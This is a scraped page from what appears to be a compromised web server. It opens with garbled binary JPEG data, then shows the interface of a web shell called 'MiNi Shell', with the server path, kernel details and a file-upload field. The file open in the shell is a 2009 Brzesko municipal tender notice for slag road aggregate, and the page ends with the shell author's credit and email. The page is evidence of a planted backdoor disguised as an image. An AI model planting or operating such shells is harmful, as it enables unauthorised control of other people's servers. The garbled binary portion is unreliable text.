JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/41560-N-2009.html

<p class="kh_header"><b>Brzesko: Dostawa kruszywa hutniczego na drogi w Gminie Brzesko</b><br>
<b>Numer ogłoszenia: 41560 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kruszywa hutniczego na drogi w Gminie Brzesko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z rozścieleniem z burty kruszywa
hutniczego o frakcjach: 0 - 12,8, 0 - 31,5, 12,8 - 31,5, 31,5 - 63,0, równoważnych /zbliżonych/ na drogi gminne i wewnętrzne /dojazdowe do pól
i gospodarstw/ miasta Brzeska i 9- ciu Sołectw w okresie od marca 2009 r. do 20
grudnia 2009 r. w ilości rzędu1500 - 2000 ton
Kruszywo hutnicze winno posiadać niezbędne atesty dokumentujące ich stosowanie
w budownictwie drogowym dla ulepszenia podłoża, nasypów i podbudów w kategorii
zastosowania - nawierzchni twardej nieulepszonej /bez jezdnej warstwy ulepszonej/,
realizowanej w technologii nawierzchni z kruszywa hutniczego o uziarnieniu od 0 -
63 mm.
W szczególności winno posiadać:
- aprobatę techniczną dla kruszywa hutniczego zawierającą minimum przeznaczenie,
zakres i warunki stosowania,
- atest higieniczny dla stosowania w budownictwie,
- / dokument stwierdzający, że koncentracja naturalnych pierwiastków
promieniotwórczych spełnia aktualne warunki określone z zarządzeniu Ministra
Zdrowia i Opieki Społecznej w sprawie dopuszczalnych stężeń i natężeń czynników
szkodliwych wydzielanych przez materiały budowlane /Monitor Polski Nr 19 z 1996r.
poz. 231/
- ocenę ekologiczną stwierdzającą, że oferowane kruszywo hutnicze nie jest
zaliczane do odpadów niebezpiecznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 14.21.22.00-2, 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości; 1.000,00 PLN
( słownie : jeden tysiąc złotych 00/100 PLN ) zgodnie z art 45  upzp oraz punktem 8 SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest:
a/ zapewnienie dostawy rzędu:1500 - 2000 ton kruszywa hutniczego żużla
wielkopiecowego posiadającego niezbędne atesty dokumentujące ich stosowanie w
budownictwie drogowym do ulepszenia podłoża i podbudów oraz nawierzchni
twardej nieulepszonej (bez jezdnej warstwy ulepszonej), realizowanej w technologii
nawierzchni z kruszywa hutniczego o uziarnieniu od 0 - 63 mm.
b/ udokumentowanych mocy przerobowych (w przypadku producentówdystrybutorów),
lub wstępnej umowy z producentem, lub dystrybutorem kruszywa,
oraz zapewnieniem poniższych warunków
c/ posiadanie minimum dwóch samochodów ciężarowych z rozładunkiem tylną i
boczną burtą,- lub umowa z firma transportową spełniającą te warunki.,
d/ dyspozycyjności dostawy - do 100 ton w okresie 3 dni,
e/ być uprawnionym do występowania w obrocie prawnym zgodnie z wymogami
ustawowymi i nie może być w trakcie procesu upadłościowego lub likwidacyjnego,
f/ posiadanie płynności finansowej,
g/ spełnienie warunków określonych w art.22 ustawy PZP,
h/ nie podleganie wykluczeniu z postępowania na podstawie art. 24 ustawy PZP,
i/ akceptacja projektu umowy stanowiącej załącznik Nr 7 SIWZ, która musi być
podpisana oraz parafowana na każdej stronie i złożona wraz z ofertą,
j/ złożenie oferty.
Ocena polega m.in. na sprawdzeniu;
- czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego
wystawienia,
- czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),
- czy zawiera informacje wymagane dla tego dokumentu,
- czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym
postępowaniu,
- czy kserokopia załączona przez wykonawców w miejsce oryginału została
potwierdzona -za zgodność- przez osoby uprawnione lub pełnomocnictwa
udzielonego przez osoby uprawnione,
- czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest
wypełniony druk ZP-14 - ocena spełnienia warunków udziału w postępowaniu. Druk
ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zerojedynkową)
oznaczenie spełnia / nie spełnia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełnienia przez dostawców warunków, o których mowa w
SIWZ, zamawiający żąda następujących dokumentów:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają
wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,
wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania
wniosków o dopuszczenie do udziału w postępowaniu
o udzielenie zamówienia albo składania ofert;
2) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz
właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie
zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne
i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące
przed upływem terminu składania wniosków o dopuszczenie do udziału w
postępowaniu o udzielenie zamówienia albo składania ofert
3) aprobatę techniczną zawierającą minimum przeznaczenie, zakres i warunki
stosowania kruszywa
4) atest higieniczny - dla stosowania w budownictwie drogowym.
5) dokument stwierdzający, że koncentracja naturalnych pierwiastków
promieniotwórczych spełnia aktualne warunki określone w zarządzeniu Ministra
Zdrowia i Opieki Społecznej w sprawie dopuszczalnych stężeń i natężeń czynników
szkodliwych wydzielanych przez materiały budowlane (Monitor Polski Nr 19 z 1996r.
poz. 231)
6) ocenę ekologiczną stwierdzającą, że oferowane kruszywo nie jest zaliczane do
odpadów niebezpiecznych
7) wykazu niezbędnego do wykonania zamówienia sprzętu(z podaniem marki
samochodu, jego tonażu oraz sposobu rozładunku tylną i boczną burtą) którym
dysponuje lub będzie dysponował wykonawca, lub pisemnego zobowiązania innego
podmiotu do udostępnienia niezbędnego do wykonania zamówienia sprzętu, jeżeli
wykonawca wskazał sprzęt, którym będzie dysponował;
W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i
finansowej zapewniającej wykonanie zamówienia, zamawiający może żądać
następujących dokumentów:
1) Oświadczenia Wykonawcy, że posiada niezbędne środki finansowe w wysokości
minimum 20. 000, 00 zł na realizację tego zadania.
2) polisy, a w przypadku jej braku innego dokumentu potwierdzającego,
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 2,
3 i 5, Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( DZ. U Nr.87
poz. 605 z późn. zm.) składa dokument lub dokumenty, wystawione w kraju, w
którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości / ważne 6 m-cy /;
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne
lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub
rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienia publiczne,
2) pkt. 4 - składa zaświadczenie właściwego organu sądowego lub
administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty
dotyczą w zakresie określonym w art.24, ust. 1 pkt 4-8 ustawy Prawo zam. publiczn.
2 Dokumenty o których mowa w pkt. 1 a i c, oraz pkt. 2, powinny być wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o
dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub składania
ofert. Dokument o którym mowa w pkt. 1 lit. B, powinien być wystawiony nie
wcześniej niż 3 miesiące przed upływem terminu składania wniosków o
dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub składania
ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 2 ust. 1
oraz w § 1 ust. 1 pkt 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja
2006 r. ( DZ. U Nr.87 poz. 605 z późn. zm.), zastępuje się je dokumentem
zawierającym oświadczenie złożone przed notariuszem, właściwym organem
sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania.
W celu potwierdzenia, że oferowane dostawy i usługi odpowiadają wymaganiom
określonym przez zamawiającego, zamawiający żąda w szczególności rzeczy i
zaświadczeń, o których mowa w § 3 Rozporządzenia Prezesa Rady Ministrów z dnia
19 maja 2006 r. ( DZ. U Nr.87 poz. 605 z późn. zm.).
1. Oświadczenia w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
2. Oświadczenia w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
3. Oświadczenia uzupełniającego w zależności od statusu prawnego Oferenta w
trybie art. 24 ust. 1 pkt 4-9 ustawy Pzp - załącznik Nr 3 SIWZ.
4. Oświadczenie o akceptacji projektu umowy na takich warunkach jak we wzorze
umowy stanowiącym - załącznik Nr 6 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd
Miejski w Brzesku, 32-800 Brzesko ul. Głowackiego 51. pok.108
tel. 0-14 68 63 100 w. 144 w dniach pracy w
godz.od 7:30 do 15:30 e-mail:henryk.piela@um.brzesko.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 09:00, miejsce: Urząd Miejski w Brzesku, 32-800 Brzesko ul. Głowackiego 51. pok.101 -Sekretariat Burmistrza Brzeska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com